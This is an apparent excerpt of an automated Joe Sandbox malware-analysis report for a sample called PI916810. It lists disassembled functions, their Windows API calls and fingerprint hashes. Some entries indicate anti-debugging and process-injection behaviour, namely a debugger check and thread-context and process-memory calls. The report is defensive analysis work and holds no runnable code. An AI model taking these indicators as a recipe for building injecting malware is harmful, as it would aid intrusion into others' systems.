                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 00464992
                                                                                                                                                                              • Part of subcall function 004835AC: __lock.LIBCMT ref: 004835B2
                                                                                                                                                                              • Part of subcall function 004835AC: DecodePointer.KERNEL32(00000001,?,004649A7,004B81BC), ref: 004835BE
                                                                                                                                                                              • Part of subcall function 004835AC: EncodePointer.KERNEL32(?,?,004649A7,004B81BC), ref: 004835C9
                                                                                                                                                                              • Part of subcall function 00464A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00464A73
                                                                                                                                                                              • Part of subcall function 00464A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00464A88
                                                                                                                                                                              • Part of subcall function 00463B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00463B7A
                                                                                                                                                                              • Part of subcall function 00463B4C: IsDebuggerPresent.KERNEL32 ref: 00463B8C
                                                                                                                                                                              • Part of subcall function 00463B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,005262F8,005262E0,?,?), ref: 00463BFD
                                                                                                                                                                              • Part of subcall function 00463B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00463C81
                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004649D2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1438897964-0
                                                                                                                                                                            • Opcode ID: 98d8447d9ce2a1d3a8ac6bcd1c0a97ce257b2f86f96e8beeab7ce856ff4be9e3
                                                                                                                                                                            • Instruction ID: 5c95839bdbf4da1b2658a146b0468269b35752e4d1d95b54aa140ec870f26fec
                                                                                                                                                                            • Opcode Fuzzy Hash: 98d8447d9ce2a1d3a8ac6bcd1c0a97ce257b2f86f96e8beeab7ce856ff4be9e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B11AE719043419FC710EF69DC4590ABBE8EFA9700F00491FF04087261EBB49A4ACB9A
                                                                                                                                                                            Function 00465DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00465981,?,?,?,?), ref: 00465E27
                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00465981,?,?,?,?), ref: 0049E19C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: d683bf10a2cd41241ec6ca9a424bbd4f542632eee7295339aa1cb75a102337a6
                                                                                                                                                                            • Instruction ID: 77e852674839389cee56edf601b59f405127906672920c72c19d8154e2ecb473
                                                                                                                                                                            • Opcode Fuzzy Hash: d683bf10a2cd41241ec6ca9a424bbd4f542632eee7295339aa1cb75a102337a6
                                                                                                                                                                            • Instruction Fuzzy Hash: C001B970244708BEF7244F14DC86F677B9CEB01768F10C31ABAE55A1D0D6B91D458B59
                                                                                                                                                                            Function 00480FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0048594C: __FF_MSGBANNER.LIBCMT ref: 00485963
                                                                                                                                                                              • Part of subcall function 0048594C: __NMSG_WRITE.LIBCMT ref: 0048596A
                                                                                                                                                                              • Part of subcall function 0048594C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000000,?,?,?,00481013,?), ref: 0048598F
                                                                                                                                                                            • std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                              • Part of subcall function 004887DB: RaiseException.KERNEL32(?,?,?,0051BAF8,00000000,?,?,?,?,00481046,?,0051BAF8,?,00000001), ref: 00488830
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3902256705-0
                                                                                                                                                                            • Opcode ID: ae6d99af412babca3aad9583e3b76a46c674004472414e54a82d6c7e03e1631f
                                                                                                                                                                            • Instruction ID: a9da8133a75eac9fedcdbb03a3bf88a7f3a3e1e12b3490244bf01702477974b9
                                                                                                                                                                            • Opcode Fuzzy Hash: ae6d99af412babca3aad9583e3b76a46c674004472414e54a82d6c7e03e1631f
                                                                                                                                                                            • Instruction Fuzzy Hash: A9F0F43450031DA6CB20BA59ED019EF7BAC9F01354F104C2FF904A2691EFB98A81879D
                                                                                                                                                                            Function 0048582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __lock_file_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 26237723-0
                                                                                                                                                                            • Opcode ID: 97fa1c07b66b310a00480c064a2eb08a1544ba233d6c5953f3d798ae9cbcfd22
                                                                                                                                                                            • Instruction ID: 72e568486b15665f924b26ad53505315217ed47193041c30c7afe79abd1f733a
                                                                                                                                                                            • Opcode Fuzzy Hash: 97fa1c07b66b310a00480c064a2eb08a1544ba233d6c5953f3d798ae9cbcfd22
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A018871800609EBCF12BF678C0559F7B61AF80364F544A1FB8145A161DB398A61DB95
                                                                                                                                                                            Function 004855D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
                                                                                                                                                                            • __lock_file.LIBCMT ref: 0048561B
                                                                                                                                                                              • Part of subcall function 00486E4E: __lock.LIBCMT ref: 00486E71
                                                                                                                                                                            • __fclose_nolock.LIBCMT ref: 00485626
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2800547568-0
                                                                                                                                                                            • Opcode ID: 186d480d90acfa7bd994d16910fd0a4eb10a272f53c64c401507dbf1e8544c05
                                                                                                                                                                            • Instruction ID: a35484d5d4e45ee5c9348bde74095c5302d88c9e8f94a1935f3a50f0f7f0e851
                                                                                                                                                                            • Opcode Fuzzy Hash: 186d480d90acfa7bd994d16910fd0a4eb10a272f53c64c401507dbf1e8544c05
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF0B471800A059AE720BF76880276F77E16F40378F958A0FB818BB1C1DF7C99429B9D
                                                                                                                                                                            Function 004681C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0046558F,?,?,?,?,?), ref: 004681DA
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0046558F,?,?,?,?,?), ref: 0046820D
                                                                                                                                                                              • Part of subcall function 004678AD: _memmove.LIBCMT ref: 004678E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3033907384-0
                                                                                                                                                                            • Opcode ID: c58328ed05cb50d2edf68b082eb40b71a980ee797d079adbb72b31a0ec1d4369
                                                                                                                                                                            • Instruction ID: 5e2c686a1f66a6fc591548d092e823da0efe978786e2965844a739a230278f79
                                                                                                                                                                            • Opcode Fuzzy Hash: c58328ed05cb50d2edf68b082eb40b71a980ee797d079adbb72b31a0ec1d4369
                                                                                                                                                                            • Instruction Fuzzy Hash: CC018F31201144BEEB246B26DD56E7B7B5CEB85760F10852AFD05CD191EE219C008666
                                                                                                                                                                            Function 010FC96D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010FD12B
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010FD1C1
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010FD1E3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2438371351-0
                                                                                                                                                                            • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                            • Instruction ID: fb841894abe95b2e87ec4bd238ffe60233907f487c857047c0bfa91d3dc341f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                            • Instruction Fuzzy Hash: EA12DD24E24658C6EB24DF64D8507DEB272EF68300F1090ED910DEB7A5E77A4E81CF5A
                                                                                                                                                                            Function 0046F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9768c990fb203b094b1a6323caac172897b32d74881450bdfee82522ec177aad
                                                                                                                                                                            • Instruction ID: 13ce9031d1f949e83845862ede42b53772dd03672669ad1d585731f1fa38262d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9768c990fb203b094b1a6323caac172897b32d74881450bdfee82522ec177aad
                                                                                                                                                                            • Instruction Fuzzy Hash: 5461EE7460024AAFCB10DF64D881A6BB7F4EF45304F14843FE9468B642EB78ED59CB5A
                                                                                                                                                                            Function 00472123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e25c071a217eb8b62abf00c898cece267d7a7c6974ca407929fd4978f47574c2
                                                                                                                                                                            • Instruction ID: ed95f7180065dfa72813a57b72bb76dafa4e26dd299668de3001329000eaa1b2
                                                                                                                                                                            • Opcode Fuzzy Hash: e25c071a217eb8b62abf00c898cece267d7a7c6974ca407929fd4978f47574c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D51B334600600AFCF14EF55C991EAE77A5AF45314F15805EF90AAB392DB38ED05CB5A
                                                                                                                                                                            Function 00465C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00465CF6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 92dfbc419fc0ae1c4e30027706a82824e9b5a079a6ff687534298f9cc59ad7fd
                                                                                                                                                                            • Instruction ID: 6cbd16b48b65b6ca750a547921a3aa3af6b24c38dcb005f0d78b3673ac87e5d8
                                                                                                                                                                            • Opcode Fuzzy Hash: 92dfbc419fc0ae1c4e30027706a82824e9b5a079a6ff687534298f9cc59ad7fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 75316E71A00B0AAFCB18DF2DC48465DB7B1FF88314F14862AD81993750E735BD50DB96
                                                                                                                                                                            Function 00480E48 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction ID: 8c077a08ea929caf4351a45eb97bf061d5b5784a7ef92551e493b7b88b48f0ee
                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction Fuzzy Hash: B031F370A10105DFC7A8EF48C48096EF7A6FF59300B248AA6E909CB751D734EDC5CB88
                                                                                                                                                                            Function 004A00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                            • Opcode ID: 65dbc99adb3a0ed61403776b70066b545126102f7732e5109d7da8cd93a28486
                                                                                                                                                                            • Instruction ID: c140ed07e3da9b4259a15c37091adf7e0a7e8a408b3ffbedc1d5e94a43699c5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 65dbc99adb3a0ed61403776b70066b545126102f7732e5109d7da8cd93a28486
                                                                                                                                                                            • Instruction Fuzzy Hash: EA4106745043518FDB24DF14C484B1ABBE1BF45318F0988AEE8899B762D33AE895CF5B
                                                                                                                                                                            Function 00465B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                                                            • Opcode ID: cbc43187a56acead02c346e58e0f219c2927142ee1629b1a5ec41ade2bd355ee
                                                                                                                                                                            • Instruction ID: eddef865e5131e23ae74ce3410a66b3ded4335c775e773c5e5c2194ed972cbcd
                                                                                                                                                                            • Opcode Fuzzy Hash: cbc43187a56acead02c346e58e0f219c2927142ee1629b1a5ec41ade2bd355ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921AE30A00A18EBDF109F52E8856AE7FB8FF11350F25C86FE485D1410EB7994A1EB4A
                                                                                                                                                                            Function 0046C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 856254489-0
                                                                                                                                                                            • Opcode ID: ef692a0cfe230a34af82c117126661b03c68ec34779b21d73db04b42557bbf8b
                                                                                                                                                                            • Instruction ID: 6892ae42e7d1ed272da9c20bad017d6bfbd4b5fc4eb6313b88a7a90589d8f096
                                                                                                                                                                            • Opcode Fuzzy Hash: ef692a0cfe230a34af82c117126661b03c68ec34779b21d73db04b42557bbf8b
                                                                                                                                                                            • Instruction Fuzzy Hash: A211C3319001199BCF14EBAADCC18EEB778AF51365F10812BE811A71A0F6349D05CB9A
                                                                                                                                                                            Function 00464F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00464D13: FreeLibrary.KERNEL32(00000000,?), ref: 00464D4D
                                                                                                                                                                              • Part of subcall function 0048548B: __wfsopen.LIBCMT ref: 00485496
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464F6F
                                                                                                                                                                              • Part of subcall function 00464CC8: FreeLibrary.KERNEL32(00000000), ref: 00464D02
                                                                                                                                                                              • Part of subcall function 00464DD0: _memmove.LIBCMT ref: 00464E1A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
